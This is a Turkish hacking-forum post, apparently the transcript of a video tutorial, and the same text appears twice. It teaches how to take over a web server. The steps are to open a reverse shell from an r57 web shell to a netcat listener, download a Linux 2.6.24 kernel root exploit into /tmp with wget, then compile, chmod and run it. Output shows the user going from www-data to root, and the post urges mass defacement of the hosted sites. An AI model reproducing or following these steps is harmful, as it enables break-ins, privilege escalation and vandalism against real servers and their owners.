UMARIM BEĞENMİŞSİNİZDİR 
1)Backconnect etmeniz için nc.exe niz olması gerekir kısa yoldan ulaşmanız için(başlat çalıstırdan) system32 nin
içine atabilirsiniz.
2)shell inizden backconnect yapmanız için server ın safe mod off yani server güvenliğinin kapalı olması gerekmekte
3) bu maddemiz de ise shellinizde backconnect yapacak bir yer olması gerekir bunun için r57 önerilir.
şimdi hemen başlarsak hedef sitemize geçelim.gördüğünüz gibi maddelerimiz sağlanmış durumda.
4)modemde portunuz açık olmalı bağlantı yapacağınız herhangi bir port 2121 ve ya 8888 en çok kullanılanları.
5)Uygun root exploiti…
hemen portumuzu dinlemeye alalım bu arada bir madde daha oldu.
şimdi hemen devam edelim.port açmayı şu an göstermeyeceğim.gördüğünüz gibi bağlantımız sağlandı şimdi server a
arka kapı dediğimiz yöntemle portlardan bağlandılk şimdi ise izinlerin olduğu bir dizine geçmemiz gerekmekte.
onun için genelde /tmp dizininde izinlerimiz yeterli olduğu için bu dizini kullaırım.orada permler müsade etmezse
başka bir dizine geçip oradan exploitinizi çağırmalısınız.bir diğer maddemiz ise root olmak için gerekli exploitiniz
olması gerekmekte bir önce ki videomda taşıma sırasında hasar çıktığı için gösteremedim onda 2009 server rootlamıştık
malesef azizliğine uğradı.neyse şimdi 2009 exploite gerek yok bu 2008 ve sürümü 2.6.24 ve bu sürüme uygun
bir exploitiniz gerekmekte.tmp dizinine geçtim buraya exploitimi çağıracağm.bunu
wget ile yapabiliriz wget exploit adresi
örnek fakat ben exploiti dahga önceden çektiğim için aynı isimde dosyam var bu derlenmiş bir root exploitidir.
bazı derlenmeden gelenler var .c uzantılı bunları derleyip çalıstırmanız gerekmmektedir.hemen onuda göstereyim.
şu şekilde yapacaksınız eğer bu derlenmemiş bir exploit olsaydı.
gcc exploitadi.c -o exploitinyeniismi ve bundan sonra exploiti kullanım şekliniz yeni ismiyle olacaktı.
şimdi perm yani exploitimize izin veriyoruz. çalıstırmadan önce yetkimize bakalım.
uid=33(www-data) gid=33(www-data) groups=33(www-data),2523(psaserv)
bingo rootuz
uid=0(root) gid=0(root) groups=33(www-data),2523(psaserv)bundan sonrası mass deface yani server ı toplu hackleme veya istediğiniz siteye bu dizinden geçerek basma özgürsünüz
Kullanılan komutlar :
ls -la : listeleme
cd : dizin değiştirme
chmod : permisyon değiştirme
Bağlanma komutu : nc -vv -l -p 443
./exploit : Exploit çalıştırma
NOT : Servera bağlanmak için safe modun off olması gerekir aksi takdirde bağlanma olmaz.
Root için yapılması gerekenler :
1-)modemde port açma (herhangi bir port)
2-)nc (windows klasörne atmak) bağlantıyı sağlamak için
3-)ve linuxa ait uygun exploiti bulmak
SPY AİLESİNE BEĞENMİŞSİNİZDİR UMARIM S1
View hidden content is available for registered users!
1)Backconnect etmeniz için nc.exe niz olması gerekir kısa yoldan ulaşmanız için(başlat çalıstırdan) system32 nin
içine atabilirsiniz.
2)shell inizden backconnect yapmanız için server ın safe mod off yani server güvenliğinin kapalı olması gerekmekte
3) bu maddemiz de ise shellinizde backconnect yapacak bir yer olması gerekir bunun için r57 önerilir.
şimdi hemen başlarsak hedef sitemize geçelim.gördüğünüz gibi maddelerimiz sağlanmış durumda.
4)modemde portunuz açık olmalı bağlantı yapacağınız herhangi bir port 2121 ve ya 8888 en çok kullanılanları.
5)Uygun root exploiti…
hemen portumuzu dinlemeye alalım bu arada bir madde daha oldu.
şimdi hemen devam edelim.port açmayı şu an göstermeyeceğim.gördüğünüz gibi bağlantımız sağlandı şimdi server a
arka kapı dediğimiz yöntemle portlardan bağlandılk şimdi ise izinlerin olduğu bir dizine geçmemiz gerekmekte.
onun için genelde /tmp dizininde izinlerimiz yeterli olduğu için bu dizini kullaırım.orada permler müsade etmezse
başka bir dizine geçip oradan exploitinizi çağırmalısınız.bir diğer maddemiz ise root olmak için gerekli exploitiniz
olması gerekmekte bir önce ki videomda taşıma sırasında hasar çıktığı için gösteremedim onda 2009 server rootlamıştık
malesef azizliğine uğradı.neyse şimdi 2009 exploite gerek yok bu 2008 ve sürümü 2.6.24 ve bu sürüme uygun
bir exploitiniz gerekmekte.tmp dizinine geçtim buraya exploitimi çağıracağm.bunu
wget ile yapabiliriz wget exploit adresi
örnek fakat ben exploiti dahga önceden çektiğim için aynı isimde dosyam var bu derlenmiş bir root exploitidir.
bazı derlenmeden gelenler var .c uzantılı bunları derleyip çalıstırmanız gerekmmektedir.hemen onuda göstereyim.
şu şekilde yapacaksınız eğer bu derlenmemiş bir exploit olsaydı.
gcc exploitadi.c -o exploitinyeniismi ve bundan sonra exploiti kullanım şekliniz yeni ismiyle olacaktı.
şimdi perm yani exploitimize izin veriyoruz. çalıstırmadan önce yetkimize bakalım.
uid=33(www-data) gid=33(www-data) groups=33(www-data),2523(psaserv)
bingo rootuz
uid=0(root) gid=0(root) groups=33(www-data),2523(psaserv)bundan sonrası mass deface yani server ı toplu hackleme veya istediğiniz siteye bu dizinden geçerek basma özgürsünüz
Kullanılan komutlar :
ls -la : listeleme
cd : dizin değiştirme
chmod : permisyon değiştirme
Bağlanma komutu : nc -vv -l -p 443
./exploit : Exploit çalıştırma
NOT : Servera bağlanmak için safe modun off olması gerekir aksi takdirde bağlanma olmaz.
Root için yapılması gerekenler :
1-)modemde port açma (herhangi bir port)
2-)nc (windows klasörne atmak) bağlantıyı sağlamak için
3-)ve linuxa ait uygun exploiti bulmak
SPY AİLESİNE BEĞENMİŞSİNİZDİR UMARIM S1
